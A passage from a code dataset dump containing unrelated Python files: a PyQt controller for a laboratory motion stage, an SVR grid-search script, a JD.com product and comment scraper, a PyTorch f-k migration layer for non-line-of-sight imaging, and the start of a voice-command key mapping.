-*-\n\"\"\"\nCreated on Thu Mar 8 16:38:38 2018\n\n@author: Mikroskop\n\"\"\"\n\nimport sys\nfrom PyQt5 import QtGui, uic\nimport PyQt5\nfrom PyQt5.QtWidgets import QMainWindow, QApplication, QMessageBox\n\n#import pyqtgraph as pg\nimport numpy as np\n#from pyqtgraph.Qt import QtGui, QtCore\n#import pandas as pd\n#import os\n#import Methods\n#from datetime import datetime\n#import pyqtgraph.exporters as exporters\n#import serial\n#from nidaqmx.constants import AcquisitionType, TaskMode, Slope,DigitalWidthUnits\n#import pprint\n#from pickle import dumps\n#from weakref import WeakKeyDictionary\nfrom XPS_ import XPS\n#import math \n\nclass StageCommunication():\n \n \n def __init__(self):\n\n # Instantiate the class\n \n test=2\n\n def connectStage(self):\n \n self.myxps = XPS()\n self.socketId = self.myxps.TCP_ConnectToServer(b'192.168.255.252', 5001, 20) # Connect to the XPS\n XPS.TCP_ConnectToServer\n if (self.socketId == -1): # Check connection passed\n print('Connection to XPS failed, check IP & Port')\n sys.exit()\n self.groupname = 'GROUP3'\n self.positionername = '.POSITIONER'\n self.group = self.groupname.encode(encoding='utf-8')\n self.positioner = self.group + self.positionername.encode()\n self.myxps.GroupKill(self.socketId, self.group) # Kill the group\n self.myxps.GroupInitialize(self.socketId, self.group) # Initialize the group \n self.myxps.GroupJogParametersSet(self.socketId, self.group, '20', '20')\n [errorCode, returnString] = self.myxps.GroupHomeSearch(self.socketId, self.group)\n \n \n # self.myxps.GroupKill(self.socketId, self.group) # Kill the group\n # self.myxps.GroupInitialize(self.socketId,self.group) # Initialize the group \n\n def setStageParams(self):\n\n # read Parameters from GUI or from File\n self.myxps.GroupJogParametersSet(self.socketId, self.group, '20', '20')\n\n def getCurrPos(self):\n [errorCode, self.currentPosition] = self.myxps.GroupPositionCurrentGet(self.socketId, self.positioner, 1)\n #Position=self.currentPosition\n #print('Positioner ' + self.positioner.decode() + ' is in mm position ' + str(self.currentPosition))\n \n #self.CalculateParameters_LightWay(Position)\n #print('Positioner ' + self.positioner.decode() + ' is in ps position ' + str(Pos_ps))\n\n def moveStageRel(self, RelativeMoveX):\n [errorCode, currentPosition] = self.myxps.GroupPositionCurrentGet(self.socketId, self.positioner, 1)\n print('Current Pos: ',currentPosition)\n print('Relative move mm: ', RelativeMoveX)\n self.myxps.GroupMoveRelative(self.socketId, self.positioner, [(float(RelativeMoveX))])\n \n # print ('Positioner ' + positioner.decode() + ' is in position ' +str(currentPosition))\n \n def moveStageAbs(self, AbsoluteMoveX):\n [errorCode, currentPosition] = self.myxps.GroupPositionCurrentGet(self.socketId, self.positioner, 1)\n print('Current Pos: ',currentPosition)\n print('Relative move mm: ', AbsoluteMoveX)\n self.myxps.GroupMoveAbsolute(self.socketId, self.positioner, [(float(AbsoluteMoveX))])\n \n # print ('Positioner ' + positioner.decode() + ' is in position ' +str(currentPosition))\n\n\n def closeStage(self):\n\n self.myxps.TCP_CloseSocket(self.socketId)\n # Close connection\n \n''' \n def CalculateParameters_StageMove(self):\n \n for key, value in StageParams_ps.items():\n mm_value=(value*3/10)/2\n StageParams_mm[key]=mm_value\n \n self.Num=(StageParams_ps['EndPoint']-StageParams_ps['StartPoint'])/StageParams_ps['StepWidth'] \n\n StageParams_mm['StartPoint']=StageParams_mm['StartPoint']-Offset_mm\n StageParams_mm['EndPoint']=StageParams_mm['EndPoint']-Offset_mm\n \n \n print('Number of Steps: ', self.Num)\n \n def CalculateParameters_LightWay(self, Position):\n Offset_ps=(Offset_mm*10/3)*2\n Position_ps=(Position*10/3)*2+Offset_ps\n \n \n return Position_ps\n''' \n\nclass MyWindow(QMainWindow):\n \n def __init__(self, parent=None): \n super(MyWindow, self).__init__(parent)\n \n self.ui=uic.loadUi('MovingStage.ui', self)\n self.show()\n \n self.Button_GoX_abs.clicked.connect(self.MoveStageAbs)\n self.Button_GoX_rel.clicked.connect(self.MoveStageRel)\n self.input_SetRelPositionX.returnPressed.connect(self.MoveStageRel)\n self.input_SetAbsPositionX.returnPressed.connect(self.MoveStageAbs)\n self.Button_Close.clicked.connect(self.close)\n self.Stage=StageCommunication()\n self.Stage.connectStage()\n self.Stage.setStageParams()\n #self.Stage.CalculateParameters_StageMove()\n #self.Stage.getCurrPos()\n \n self.Main()\n \n def closeEvent(self, event):\n reply = QMessageBox.question(self, 'Message',\n \"Are you sure to quit?\", QMessageBox.Yes, QMessageBox.No)\n if reply == QMessageBox.Yes:\n self.Stage.closeStage()\n event.accept()\n else:\n event.ignore()\n \n \n \n def Main(self):\n self.timer = PyQt5.QtCore.QTimer()\n self.timer.timeout.connect(self.update)\n self.timer.start(50) \n self.Stage=StageCommunication()\n self.Stage.connectStage()\n self.Stage.setStageParams()\n #self.Stage.CalculateParameters_StageMove()\n #self.Stage.getCurrPos()\n \n def update(self): \n self.getCurrentPosition_X()\n \n \n \n def getCurrentPosition_X(self):\n res2=self.Stage.getCurrPos()\n #print(res2)\n res = self.Stage.currentPosition\n #res = self.XPS().GroupPositionCurrentGet(self.socketId, self.positioner, 1)\n res = float(res)\n PosX = round(res,4)\n if PosX == -0.0:\n PosX = 0.0\n else:\n PosX = PosX\n #print(PosX)\n self.Read_CurrentPostionX.setText(str(PosX))\n \n def MoveStageRel(self):\n move = self.input_SetRelPositionX.text()\n self.Stage.moveStageRel(move)\n \n def MoveStageAbs(self):\n move = self.input_SetAbsPositionX.text()\n self.Stage.moveStageAbs(move)\n \n \n \n\n\nif __name__ == '__main__':\n app = QApplication(sys.argv)\n window=MyWindow()\n sys.exit(app.exec_())","sub_path":"src/modules/MovingStageY.py","file_name":"MovingStageY.py","file_ext":"py","file_size_in_byte":6541,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"386092816","text":"\n\n\"\"\"\nCode for running kernalized linear regression.\nIncludes options for kernelized ridge regression and support vector regression.\n\"\"\"\n\nimport csv\nimport numpy as np\nfrom sklearn.metrics import mean_squared_error\nfrom sklearn.kernel_ridge import KernelRidge\nfrom sklearn import svm\nfrom sklearn import datasets\nfrom sklearn.model_selection import cross_val_score\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.grid_search import GridSearchCV\nfrom sklearn.metrics import mean_squared_error\nfrom sklearn.preprocessing import normalize, scale, robust_scale\n\n\n\"Import data for training and test set:\"\n\n\ntraining_data = csv.reader(open(\"train.csv\", \"r\"), delimiter=\",\")\ntraining_data = list(training_data)\ntraining_data = training_data[1:]\ntraining_data = np.array(training_data).astype(float)\ntraining_data =np.random.permutation(training_data)\ntrainData_x = training_data[:,2:]\ntrainData_y = training_data[:,1]\n\ntest_data= csv.reader(open(\"test.csv\", \"r\"), delimiter=\",\")\ntest_data = (list(test_data))[1:]\ntest_data = np.array(test_data).astype(float)\ntestData_x = test_data[:,1:]\ntestDataID = test_data[:,0].astype(int)\n\n\n\"Some code for preprocessing data: see sklearn doc for info.\"\n\n# normalize(trainData_x, norm='l2', copy=False, return_norm=False)\n\n# scale(trainData_x, axis=1, with_mean=True, with_std=False, copy=False)\n\n#trainData_x_scaled=robust_scale(trainData_x, axis=0, with_centering=True, with_scaling=True, quantile_range=(25.0, 75.0), copy=True)\n\n\n\"Using kernel ridge as estimator:\"\n\n\n#KernRidge_RBF = KernelRidge(alpha=.5, kernel = 'rbf',gamma=0.05)\n#KernRidge_poly = KernelRidge(alpha=.5, kernel = 'polynomial',degree=4)\n\n\n\"... and for SVR:\"\n\n#svr_rbf = svm.SVR(kernel='rbf', C=1e3, gamma=0.08)\nsvr_poly = svm.SVR(kernel='poly', C=1, gamma=0.1)\n\n\n\"\"\"\nDefine paramaters for grid search to search through.\nYou can specify these parameters when you define the estimators, or if you want to search for optimal values, put them in the dictionaries below. \n\"\"\"\n# parameters for kRR\nparam_KRR={\n 'degree': list(range(1,12)),\n 'coef0': list(range(0,2)),\n 'alpha': np.arange(0.3,5,0.1)\n}\n\n# parameters for SVR\nparam_SVR={\n 'degree': list(range(1,12)),\n 'coef0': list(range(0,2)),\n 'C': list(np.arange(0.5,5,0.5)),\n 'epsilon': list(np.arange(0.05,1,0.05))\n}\n\n\n\"Run grid search through hyperparameters:\"\n\n# enter estimator to use, dictionary of parameters, and 'cv' value (how many folds in cross validation).\nGS_results = GridSearchCV(svr_poly, param_grid=param_SVR,cv=10,scoring='mean_squared_error')\n\nGS_results.fit(trainData_x,trainData_y)\n\n\"Print out performance and parameters of best model\"\n\nprint ('Best parameters from grid search ',GS_results.best_params_)\n\n#(negative and root to give RMSE, b/c error given is negative mean squared error)\nprint ('lowest RMSE from grid search ',(-GS_results.best_score_)**0.5) \n\nprint ('best model from grid search ',GS_results.best_estimator_)\n\n\n","sub_path":"task1/Sensible_Version_GridSearchCV.py","file_name":"Sensible_Version_GridSearchCV.py","file_ext":"py","file_size_in_byte":2937,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"2099404","text":"#https://search.jd.com/Search?keyword=%E5%B7%A7%E5%85%8B%E5%8A%9B&enc=utf-8&wq=%E5%B7%A7%E5%85%8B%E5%8A%9B&pvid=343929dad1e74534aba44084e5d29931\n#https://search.jd.com/Search?keyword=%E5%B7%A7%E5%85%8B%E5%8A%9B&enc=utf-8&qrst=1&rt=1&stop=1&vt=2&wq=%E5%B7%A7%E5%85%8B%E5%8A%9B&stock=1&page=3&s=57&click=0\n#https://search.jd.com/Search?keyword=%E5%B7%A7%E5%85%8B%E5%8A%9B&enc=utf-8&qrst=1&rt=1&stop=1&vt=2&wq=%E5%B7%A7%E5%85%8B%E5%8A%9B&stock=1&page=5&s=110&click=0\n#https://search.jd.com/Search?keyword=%E5%B7%A7%E5%85%8B%E5%8A%9B&enc=utf-8&qrst=1&rt=1&stop=1&vt=2&wq=%E5%B7%A7%E5%85%8B%E5%8A%9B&stock=1&page=7&s=163&click=0\nfrom bs4 import BeautifulSoup\nimport requests\nimport re\nimport csv\nimport os\n\ndef getHTMLText(url):\n try:\n headers = {\n 'User-Agent': 'User-Agent:Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36'}\n r = requests.get(url, headers=headers,timeout=30)\n r.raise_for_status()\n r.encoding = r.apparent_encoding\n return r.text\n except:\n return \"\"\n\ndef parsePage(ilt, html):\n try:\n soup = BeautifulSoup(html, 'html.parser')\n for news in soup.select('.gl-item'):\n title = news.find('div', class_='p-name').text.strip()\n #title = news.select('.p-name.p-name-type-2 a')[0].text.strip()\n #print(title)\n price = news.select('.p-price')[0].text.strip()\n commit = news.select('.p-commit')[0].text.strip()\n urls = r'http://' + news.select('.p-img')[0].contents[1]['href']\n ilt.append([title, price, commit,urls])\n\n\n #print(ilt)\n\n\n except:\n print(\"\")\n\ndef printGoodsList(ilt):\n #tplt = \"{:^8}\\t{:^16}\\t{:^8}\"\n #print(tplt.format(\"序号\", \"名称\", \"价格\"), chr(12288))\n count = 0\n for g in ilt:\n count = count + 1\n #print(tplt.format(count, g[0], g[1], g[2]), chr(12288))\n print(\"%d、 \\n 名称:%s \\n 价格:%s\\n 评论:%s\\n 网址:%s\" % (count,g[0], g[1], g[2],g[3]))\n\ndef printComnent():\n url1 = 'https://sclub.jd.com/comment/productPageComments.action?' \\\n 'callback=fetchJSON_comment98vv76668&productId='\n url2= '&score=0&sortType=5&page='\n url3 = '&pageSize=10&isShadowSku=0&rid=0&fold=1'\n ID=input(\"请输入产品编号\")\n depth =input(\"请输入你要爬取的评论页码数:\")\n for i in range(int(depth)):\n url = url1+str(ID)+url2 + str(i) + url3\n #print(url)\n r = requests.get(url=url)\n html = r.content\n # print(\"当前抓取页面:\",url,\"状态:\",r)\n html = str(html, encoding=\"GBK\")\n content = re.findall(r'\"guid\".*?,\"content\":(.*?),', html)\n for j in range(len(content)):\n print(str(i * 10 + j + 1) + content[j])\n\ndef save(ilt):\n path = 'F:/数据/'\n if not os.path.exists(path):\n os.mkdir(path)\n with open( '京东商品数据.csv', 'w') as f:\n writer = csv.writer(f)\n writer.writerow(['商品', '价格', '评论数', '链接'])\n writer.writerows(ilt)\n f.close()\n\n\n\ndef main():\n print('请输入爬取商品:')\n goods = input()\n print('请输入爬取页数:')\n depth = int(input())\n print(\"正在抓取...........................................\")\n start_url = 'https://search.jd.com/Search?keyword=' + goods\n infolist = []\n for i in range(depth):\n try:\n url = start_url + '&enc=utf-8&page=' + str(2 * i + 1)\n #print(url)\n html = getHTMLText(url)\n #print(html)\n parsePage(infolist, html)\n except:\n continue\n #print(infolist)\n printGoodsList(infolist)\n printComnent()\n save(infolist)\n\nmain()","sub_path":"JD/JDspider_to_excel.py","file_name":"JDspider_to_excel.py","file_ext":"py","file_size_in_byte":3771,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"466442418","text":"\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport numpy as np\n\n\n################################################################\nclass lct_fk(nn.Module):\n \n def __init__(self, spatial=256, crop=512, \\\n bin_len=0.01, wall_size=2.0, align_corners=False):\n super(lct_fk, self).__init__()\n \n self.spatial_grid = spatial\n self.crop = crop\n assert 2 ** int(np.log2(crop)) == crop\n \n self.bin_len = bin_len\n self.wall_size = wall_size\n \n self.align_corners = align_corners\n \n self.parpareparam()\n \n def change_bin_len(self, bin_len):\n print('change bin_len from %f to %f' % (self.bin_len, bin_len))\n \n self.bin_len = bin_len\n self.bin_resolution = self.bin_len / self.c\n self.trange = self.crop * self.c * self.bin_resolution\n \n temprol_grid = self.crop\n sptial_grid = self.spatial_grid\n M = temprol_grid\n N = sptial_grid\n \n fkrange = ((N * self.trange) / (M * self.width * 4)) ** 2\n gridznew = fkrange * self.gridxy_change + self.gridz_change\n gridznew = np.sqrt(gridznew)\n self.gridznew = torch.from_numpy(gridznew)\n \n newsame_1x2Mx2Nx2Nx1 = self.gridznew.unsqueeze(0).unsqueeze(4)\n newx = self.gridx_2Mx2Nx2N.unsqueeze(0).unsqueeze(4)\n newy = self.gridy_2Mx2Nx2N.unsqueeze(0).unsqueeze(4)\n self.newcoord_1x2Mx2Nx2Nx3 = torch.cat([newx, newy, newsame_1x2Mx2Nx2Nx1], dim=4)\n \n dnum = self.newcoord_dx2Mx2Nx2Nx3_todev.shape[0]\n dev = self.newcoord_dx2Mx2Nx2Nx3_todev.device\n self.newcoord_dx2Mx2Nx2Nx3_todev = self.newcoord_1x2Mx2Nx2Nx3.to(dev).repeat(dnum, 1, 1, 1, 1)\n self.gridznew_todev = self.gridznew.to(dev)\n \n #####################################################\n def parpareparam(self,):\n \n self.c = 3e8\n self.width = self.wall_size / 2.0;\n self.bin_resolution = self.bin_len / self.c\n self.trange = self.crop * self.c * self.bin_resolution\n \n ########################################################3\n temprol_grid = self.crop\n sptial_grid = self.spatial_grid\n \n ############################################################\n gridz_M = np.arange(temprol_grid, dtype=np.float32)\n gridz_M = gridz_M / (temprol_grid - 1)\n gridz_1xMx1x1 = gridz_M.reshape(1, -1, 1, 1)\n self.gridz_1xMx1x1 = torch.from_numpy(gridz_1xMx1x1.astype(np.float32))\n \n #######################################################\n zdim = np.arange(2 * temprol_grid, dtype=np.float32)\n xdim = np.arange(2 * sptial_grid, dtype=np.float32)\n\n zdim = (zdim - temprol_grid) / temprol_grid\n xdim = (xdim - sptial_grid) / sptial_grid\n ydim = xdim\n \n [gridy_2Nx2Nx2M, gridx_2Nx2Nx2M, gridz_2Nx2Nx2M] = np.meshgrid(xdim, ydim, zdim)\n gridz_2Mx2Nx2N = np.transpose(gridz_2Nx2Nx2M, [2, 1, 0])\n gridy_2Mx2Nx2N = np.transpose(gridy_2Nx2Nx2M, [2, 1, 0])\n gridx_2Mx2Nx2N = np.transpose(gridx_2Nx2Nx2M, [2, 1, 0])\n \n '''\n print(gridz_2Mx2Nx2N[:, 0, 0])\n print(gridy_2Mx2Nx2N[0, :, 0])\n print(gridx_2Mx2Nx2N[0, 0, :])\n '''\n \n self.gridz_2Mx2Nx2N = torch.from_numpy(gridz_2Mx2Nx2N)\n self.gridy_2Mx2Nx2N = torch.from_numpy(gridy_2Mx2Nx2N)\n self.gridx_2Mx2Nx2N = torch.from_numpy(gridx_2Mx2Nx2N)\n \n self.gridxy_change = gridx_2Mx2Nx2N ** 2 + gridy_2Mx2Nx2N ** 2\n self.gridz_change = gridz_2Mx2Nx2N ** 2\n \n ###################################################\n M = temprol_grid\n N = sptial_grid\n \n fkrange = ((N * self.trange) / (M * self.width * 4)) ** 2\n gridznew = fkrange * self.gridxy_change + self.gridz_change\n gridznew = np.sqrt(gridznew)\n self.gridznew = torch.from_numpy(gridznew)\n \n newsame_1x2Mx2Nx2Nx1 = self.gridznew.unsqueeze(0).unsqueeze(4)\n newx = self.gridx_2Mx2Nx2N.unsqueeze(0).unsqueeze(4)\n newy = self.gridy_2Mx2Nx2N.unsqueeze(0).unsqueeze(4)\n self.newcoord_1x2Mx2Nx2Nx3 = torch.cat([newx, newy, newsame_1x2Mx2Nx2Nx1], dim=4)\n \n ####################################################\n self.xdim = xdim\n self.zdim = zdim\n self.z0pos = np.where(zdim > 0)[0][0]\n print('zzeropos %d' % self.z0pos)\n \n def todev(self, dev, dnum):\n self.gridz_1xMx1x1_todev = self.gridz_1xMx1x1.to(dev)\n self.gridz_square_1xMx1x1 = self.gridz_1xMx1x1_todev ** 2\n self.datapad_Dx2Tx2Hx2W = torch.zeros((dnum, 2 * self.crop, 2 * self.spatial_grid, 2 * self.spatial_grid), dtype=torch.float32, device=dev)\n \n self.newcoord_dx2Mx2Nx2Nx3_todev = self.newcoord_1x2Mx2Nx2Nx3.to(dev).repeat(dnum, 1, 1, 1, 1)\n self.gridz_2Mx2Nx2N_todev = self.gridz_2Mx2Nx2N.to(dev)\n self.gridznew_todev = self.gridznew.to(dev)\n \n def roll_1(self, x_bxtxhxwx2, dim, n):\n if dim == 1:\n a = torch.cat((x_bxtxhxwx2[:, -n:], x_bxtxhxwx2[:, :-n]), dim=dim)\n if dim == 2:\n a = torch.cat((x_bxtxhxwx2[:, :, -n:], x_bxtxhxwx2[:, :, :-n]), dim=dim)\n if dim == 3:\n a = torch.cat((x_bxtxhxwx2[:, :, :, -n:], x_bxtxhxwx2[:, :, :, :-n]), dim=dim)\n return a\n \n def forward(self, feture_bxdxtxhxw, tbes, tens):\n \n ###############################################\n # 1 padd data with zero\n bnum, dnum, tnum, hnum, wnum = feture_bxdxtxhxw.shape\n for tbe, ten in zip(tbes, tens):\n assert tbe >= 0\n assert ten <= self.crop\n dev = feture_bxdxtxhxw.device\n \n featpad_bxdxtxhxw = []\n for i in range(bnum):\n featpad_1xdxt1xhxw = torch.zeros((1, dnum, tbes[i], hnum, wnum), dtype=torch.float32, device=dev)\n featpad_1xdxt2xhxw = torch.zeros((1, dnum, self.crop - tens[i], hnum, wnum), dtype=torch.float32, device=dev)\n featpad_1xdxtxhxw = torch.cat([featpad_1xdxt1xhxw, feture_bxdxtxhxw[i:i + 1], featpad_1xdxt2xhxw], dim=2)\n featpad_bxdxtxhxw.append(featpad_1xdxtxhxw)\n featpad_bxdxtxhxw = torch.cat(featpad_bxdxtxhxw, dim=0)\n \n # 2 params\n assert hnum == wnum\n assert hnum == self.spatial_grid\n sptial_grid = hnum\n temprol_grid = self.crop\n \n #################################################\n # step 0, pad data\n data_BDxTxHxW = featpad_bxdxtxhxw.view(bnum * dnum, self.crop, hnum, wnum)\n \n # c gridz_1xMx1x1 = self.gridz_1xMx1x1_todev\n # data_BDxTxHxW = data_BDxTxHxW * (gridz_1xMx1x1 ** 2)\n gridz_square_1xMx1x1 = self.gridz_square_1xMx1x1\n data_BDxTxHxW = data_BDxTxHxW * gridz_square_1xMx1x1\n \n # numerical issue\n data_BDxTxHxW = F.relu(data_BDxTxHxW, inplace=False)\n data_BDxTxHxW = torch.sqrt(data_BDxTxHxW)\n \n # datapad_BDx2Tx2Hx2W = torch.zeros((bnum * dnum, 2 * temprol_grid, 2 * sptial_grid, 2 * sptial_grid), dtype=torch.float32, device=dev)\n datapad_Dx2Tx2Hx2W = self.datapad_Dx2Tx2Hx2W\n # create new variable\n datapad_BDx2Tx2Hx2W = datapad_Dx2Tx2Hx2W.repeat(bnum, 1, 1, 1)\n\n datapad_BDx2Tx2Hx2W[:, :temprol_grid, :sptial_grid, :sptial_grid] = data_BDxTxHxW\n\n ###############################################\n # 1 fft\n # datapad_BDx2Tx2Hx2Wx2 = torch.stack([datapad_BDx2Tx2Hx2W, torch.zeros_like(datapad_BDx2Tx2Hx2W)], dim=4)\n datafre_BDX2Tx2Hx2Wx2 = torch.rfft(datapad_BDx2Tx2Hx2W, 3, onesided=False)\n \n # fftshift\n datafre_BDX2Tx2Hx2Wx2 = self.roll_1(datafre_BDX2Tx2Hx2Wx2, dim=1, n=temprol_grid)\n datafre_BDX2Tx2Hx2Wx2 = self.roll_1(datafre_BDX2Tx2Hx2Wx2, dim=2, n=sptial_grid)\n datafre_BDX2Tx2Hx2Wx2 = self.roll_1(datafre_BDX2Tx2Hx2Wx2, dim=3, n=sptial_grid)\n \n #########################################################\n # step2, ttrlt trick\n # simulate interpn\n # treat x and y as batch, sample z\n # shift\n \n if True:\n \n datafre_BDx2x2Hx2Wx2T = datafre_BDX2Tx2Hx2Wx2.permute(0, 4, 1, 2, 3)\n \n '''\n size = datafre_BDx2x2Hx2Wx2T.shape\n theta = torch.from_numpy(np.eye(3, 4, dtype=np.float32)).unsqueeze(0)\n gridstmp = F.affine_grid(theta, size, align_corners=self.align_corners)\n x = gridstmp[:, :, :, :, 0:1]\n y = gridstmp[:, :, :, :, 1:2]\n z = gridstmp[:, :, :, :, 2:3]\n '''\n \n newcoord_BDx2Mx2Nx2Nx3 = self.newcoord_dx2Mx2Nx2Nx3_todev.repeat(bnum, 1, 1, 1, 1)\n \n if True:\n datafrenew = F.grid_sample(datafre_BDx2x2Hx2Wx2T, newcoord_BDx2Mx2Nx2Nx3, \\\n mode='bilinear', padding_mode='zeros', \\\n align_corners=self.align_corners)\n else:\n datafrenew = F.grid_sample(datafre_BDx2x2Hx2Wx2T, newcoord_BDx2Mx2Nx2Nx3, \\\n mode='bilinear', padding_mode='zeros')\n \n tdata_BDx2Tx2Hx2Wx2 = datafrenew.permute(0, 2, 3, 4, 1)\n tdata_BDx2Tx2Hx2Wx2 = tdata_BDx2Tx2Hx2Wx2.contiguous()\n \n ############################################################\n # actually, pytorch sampling will lead a little different\n else:\n import scipy.interpolate as si\n zdim = self.zdim\n xdim = self.xdim\n ydim = xdim\n \n gridznew = self.gridznew.numpy()\n gridy_2Mx2Nx2N = self.gridy_2Mx2Nx2N.numpy()\n gridx_2Mx2Nx2N = self.gridx_2Mx2Nx2N.numpy()\n \n datafre_bdxtxhxwx2 = datafre_BDX2Tx2Hx2Wx2.detach().cpu().numpy()\n datafre_bdxtxhxw = datafre_bdxtxhxwx2[:, :, :, :, 0] + 1j * datafre_bdxtxhxwx2[:, :, :, :, 1]\n \n re = []\n for datafre in datafre_bdxtxhxw:\n tvol = si.interpn(points=(zdim, ydim, xdim), values=datafre, \\\n xi=np.stack([gridznew, gridy_2Mx2Nx2N, gridx_2Mx2Nx2N], axis=3), \\\n method='linear', bounds_error=False, fill_value=0)\n re.append(tvol)\n \n re_bdxtxhxw = np.stack(re)\n re_real_bdxtxhxw = np.real(re_bdxtxhxw)\n re_imag_bdxtxhxw = np.imag(re_bdxtxhxw)\n \n re_real_bdxtxhxw = torch.from_numpy(re_real_bdxtxhxw).to(dev)\n re_imag_bdxtxhxw = torch.from_numpy(re_imag_bdxtxhxw).to(dev)\n tdata_BDx2Tx2Hx2Wx2 = torch.stack([re_real_bdxtxhxw, re_imag_bdxtxhxw], dim=4)\n \n #############################################################\n samplez_1xMxNxNx1 = self.gridz_2Mx2Nx2N_todev.unsqueeze(0).unsqueeze(4)\n sampleznew = self.gridznew_todev.unsqueeze(0).unsqueeze(4)\n \n tdata_BDx2Tx2Hx2Wx2[:, :self.z0pos, :, :, :] = 0\n tdata_BDx2Tx2Hx2Wx2 = tdata_BDx2Tx2Hx2Wx2 * samplez_1xMxNxNx1.abs()\n \n tdata_BDx2Tx2Hx2Wx2 = tdata_BDx2Tx2Hx2Wx2 / (sampleznew + 1e-8)\n \n ###########################################\n # ifft\n tdata_BDx2Tx2Hx2Wx2 = self.roll_1(tdata_BDx2Tx2Hx2Wx2, dim=1, n=temprol_grid)\n tdata_BDx2Tx2Hx2Wx2 = self.roll_1(tdata_BDx2Tx2Hx2Wx2, dim=2, n=sptial_grid)\n tdata_BDx2Tx2Hx2Wx2 = self.roll_1(tdata_BDx2Tx2Hx2Wx2, dim=3, n=sptial_grid)\n \n data = torch.ifft(tdata_BDx2Tx2Hx2Wx2, 3)\n data = data[:, :temprol_grid, :sptial_grid, :sptial_grid]\n data = data[:, :, :, :, 0] ** 2 + data[:, :, :, :, 1] ** 2;\n \n ##########################################################################3\n volumn_BDxTxHxW = data.view(bnum * dnum, self.crop, hnum, wnum)\n \n volumn_BxDxTxHxW = volumn_BDxTxHxW.view(bnum, dnum, self.crop, hnum, wnum)\n \n return volumn_BxDxTxHxW\n\n\nif __name__ == '__main__':\n \n import os\n import cv2\n import numpy as np\n \n '''\n fd = '/u6/a/wenzheng/remote2/code-nlos-git/OccludedSceneRep-2/code/pytorch-wz/dataloader_light22_bbox';\n ims = []\n tbe = -1\n for i in range(512):\n name = '%s/2-%d.png' % (fd, i)\n if not os.path.isfile(name):\n ims.append(np.zeros((256, 256), dtype=np.uint8))\n continue\n \n if tbe < 0:\n tbe = i\n \n im = cv2.imread(name)\n imgt = im[:256, :256, :]\n im = im[:256, -256:, :]\n imgray = cv2.cvtColor(im, cv2.COLOR_BGR2GRAY)\n ims.append(imgray)\n \n rect_data_txhxw = np.array(ims, dtype=np.float32) / 255.0\n rect_data_hxwxt = np.transpose(rect_data_txhxw, [1, 2, 0])\n '''\n \n from scipy.io import loadmat\n \n data = loadmat('/home/wenzheng/largestore/nlos-phasor/nlos-fk-master/statue.mat')\n rect_data_hxwxt = data['data']\n \n sptial_grid = 512\n crop = 512\n bin_len = 32e-12 * 3e8 # 0.01\n \n K = 2\n temds = False\n for k in range(K):\n rect_data_hxwxt = rect_data_hxwxt[::2, :, :] + rect_data_hxwxt[1::2, :, :]\n rect_data_hxwxt = rect_data_hxwxt[:, ::2, :] + rect_data_hxwxt[:, 1::2, :]\n sptial_grid = sptial_grid // 2\n \n if temds:\n rect_data_hxwxt = rect_data_hxwxt[:, :, ::2] + rect_data_hxwxt[:, :, 1::2]\n crop = crop // 2\n bin_len = bin_len * 2 \n \n rect_data_dxhxwxt = np.expand_dims(rect_data_hxwxt, axis=0)\n rect_data_bxdxhxwxt = np.expand_dims(rect_data_dxhxwxt, axis=0)\n \n bnum = 3\n dnum = 1\n rect_data_bxdxhxwxt = np.tile(rect_data_bxdxhxwxt, [bnum, dnum, 1, 1, 1])\n rect_data_bxdxhxwxt = torch.from_numpy(rect_data_bxdxhxwxt).cuda()\n \n dev = 'cuda'\n \n #####################################################################\n lctlayer = lct_fk(spatial=sptial_grid, crop=crop, bin_len=bin_len)\n lctlayer.todev(dev, dnum)\n \n tbe = 0 // (2 ** K)\n if temds:\n tlen = 512 // (2 ** K)\n else:\n tlen = 512\n \n for i in range(10):\n print(i)\n re = lctlayer(rect_data_bxdxhxwxt[:, :, :, :, tbe:tbe + tlen].permute(0, 1, 4, 2, 3), \\\n [tbe, tbe, tbe], [tbe + tlen, tbe + tlen, tbe + tlen])\n \n volumn_MxNxN = re.detach().cpu().numpy()[0, -1]\n zdim = volumn_MxNxN.shape[0] * 100 // 128\n volumn_MxNxN = volumn_MxNxN[:zdim]\n print('volumn min, %f' % volumn_MxNxN.min())\n print('volumn max, %f' % volumn_MxNxN.max())\n \n volumn_MxNxN[volumn_MxNxN < 0] = 0\n front_view = np.max(volumn_MxNxN, axis=0)\n cv2.imshow(\"re\", front_view / np.max(front_view))\n # cv2.imshow(\"gt\", imgt)\n cv2.waitKey()\n \n volumn_ZxYxX = volumn_MxNxN\n volumn_ZxYxX = volumn_ZxYxX / np.max(volumn_ZxYxX)\n for i, frame in enumerate(volumn_ZxYxX):\n print(i)\n cv2.imshow(\"re1\", frame)\n cv2.imshow(\"re2\", frame / np.max(frame))\n cv2.waitKey(0)\n","sub_path":"DL_inference/utils_pytorch/tffk.py","file_name":"tffk.py","file_ext":"py","file_size_in_byte":15142,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"247561334","text":"from Actions import Key, Text\nfrom protocol import Integer, Dictation, RuleType\nfrom requirements.Emacs import NotEmacs\nfrom requirements.Terminal import NotTerminal\nfrom rules.emacs.Cmd import CharCmd\nfrom rules.ContextualRule import makeContextualRule\n\n_mapping = {\n \"copy\" : Key(\"c-c\"),\n \"cut\" : Key(\"c-x\"),\n \"paste\" : Key(\"c-v\"),\n \"term paste\" : Key(\"s-insert\"),\n \"select all\" : Key(\"c-a\"),\n \"select per\" : Key(\"cs-left\"),\n \"select pro\" : Key(\"cs-right\"),\n \"select home\" : Key(\"s-home\"),\n \"select edge\" : Key(\"s-end\"),\n \"undo\" : Key(\"c-z\"),\n \"redo\" : Key(\"c-y\"),\n \"next form\" : Key(\"tab\"),\n \"previous form\" : Key(\"s-tab\"),\n \"axe\" : Key(\"escape\"),\n \"find\" : Key(\"c-f\"),\n \"find it next []\" : Key(\"F3:%(n)d\"),\n \"find it previous []\" : Key(\"s-F3:%(n)d\"),\n \"leaf []\" : Key(\"pgdown:%(n)d\"),\n \"feel []\" : Key(\"pgup:%(n)d\"),\n \"home\" : Key(\"home\"),\n 